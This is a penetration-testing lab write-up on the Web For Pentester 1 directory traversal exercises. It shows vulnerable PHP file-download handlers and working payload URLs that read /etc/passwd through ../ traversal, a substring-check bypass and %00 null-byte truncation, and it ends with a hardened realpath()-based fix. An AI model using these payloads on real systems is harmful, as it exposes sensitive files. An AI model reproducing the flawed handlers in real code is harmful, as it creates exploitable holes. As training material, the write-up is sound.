Web For Pentester 1 - Directory traversal

    Example 1

    Source:

    <?php

    $UploadDir = '/var/www/files/';

    if (!(isset($_GET['file'])))
        die();

    $file = $_GET['file'];

    // user input is appended to the upload directory without any filtering
    $path = $UploadDir . $file;

    if (!is_file($path))
        die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($path) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($path));

    $handle = fopen($path, 'rb');

    do {
        $data = fread($handle, 8192);
        if (strlen($data) == 0) {
            break;
        }
        echo($data);
    } while (true);

    fclose($handle);
    exit();

    ?>

    Explanation: by default the avatar hack.png is served as binary data. In $handle = fopen($path, 'rb') the path variable has not been filtered in any way, so a value of the form ../../../ escapes the upload directory (directory traversal).

    payload:

    http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd

    Example 2

    Source:

    <?php

    if (!(isset($_GET['file'])))
        die();

    $file = $_GET['file'];

    // only checks that the string CONTAINS the directory, not that the
    // resolved path stays inside it
    if (!(strstr($file,"/var/www/files/")))
        die();

    if (!is_file($file))
        die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($file) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));

    $handle = fopen($file, 'rb');

    do {
        $data = fread($handle, 8192);
        if (strlen($data) == 0) {
            break;
        }
        echo($data);
    } while (true);

    fclose($handle);
    exit();

    ?>

    Explanation: here the file parameter is required to contain /var/www/files/, but that check does not stop us from traversing with ../../ after it:

    payload:

    http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

    Example 3

    Source:

    <?php
    $UploadDir = '/var/www/files/';

    if (!(isset($_GET['file'])))
        die();

    $file = $_GET['file'];

    // forces a .png suffix, but the suffix is appended AFTER user input
    $path = $UploadDir . $file.".png";
    // Simulate null-byte issue that used to be in filesystem related functions in PHP
    $path = preg_replace('/\x00.*/',"",$path);

    if (!is_file($path))
        die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($path) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($path));

    $handle = fopen($path, 'rb');

    do {
        $data = fread($handle, 8192);
        if (strlen($data) == 0) {
            break;
        }
        echo($data);
    } while (true);

    fclose($handle);
    exit();

    ?>

    Explanation:

    $path = $UploadDir . $file.".png"; restricts the file that is read to names ending in the .png suffix, but this can be bypassed with null-byte (%00) truncation: on PHP <= 5.3.4, with magic quotes turned off, the truncation succeeds.

    $path = preg_replace('/\x00.*/',"",$path); is a regular expression that replaces \x00 and everything after it with the empty string, so the trailing %00.png is removed entirely.

    payload:

    http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00
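    As an added example (not part of the Web For Pentester source), the three weaknesses above fixed in one hardened handler: the requested name is resolved with realpath() and must remain inside the upload directory, null bytes are rejected before any filesystem call, and the .png restriction is checked on the resolved path instead of by appending a suffix. The temp directory and file names in the demo are constructed.

```php
<?php
// Added example, not Web For Pentester code: hardened version of the
// handler above. The upload directory and file names below are constructed.

function resolve_download_path(string $uploadDir, string $file): ?string
{
    // Example 3: a null byte must never reach a filesystem function.
    if ($file === '' || strpos($file, "\0") !== false) {
        return null;
    }
    $base = realpath($uploadDir);
    if ($base === false) {
        return null;
    }
    // Example 2: the value is always joined under $base, so a leading "/"
    // cannot redirect it; realpath() then collapses every "../".
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Example 1: after resolution the path must still be inside $base.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // Example 3's intent, enforced on the resolved name instead of by appending.
    if (strtolower(pathinfo($candidate, PATHINFO_EXTENSION)) !== 'png') {
        return null;
    }
    return $candidate;
}

// Demo with a constructed upload directory in the system temp folder.
$dir = sys_get_temp_dir() . '/files_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/hack.png', 'PNG');

$inputs = [
    'hack.png',                            // legitimate request
    '../../../etc/passwd',                 // Example 1 payload
    '/var/www/files/../../../etc/passwd',  // Example 2 payload
    "../../../../../etc/passwd\0",         // Example 3 payload (%00 decoded)
];
foreach ($inputs as $in) {
    $r = resolve_download_path($dir, $in);
    printf("%-40s => %s\n", addcslashes($in, "\0"), $r === null ? 'rejected' : 'ok');
}
unlink($dir . '/hack.png');
rmdir($dir);
```

    Only the first input is accepted; the three payloads from the examples are rejected by the null-byte check or the prefix comparison on the resolved path.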

    OVER!

Original article: https://www.cnblogs.com/hack404/p/13192007.html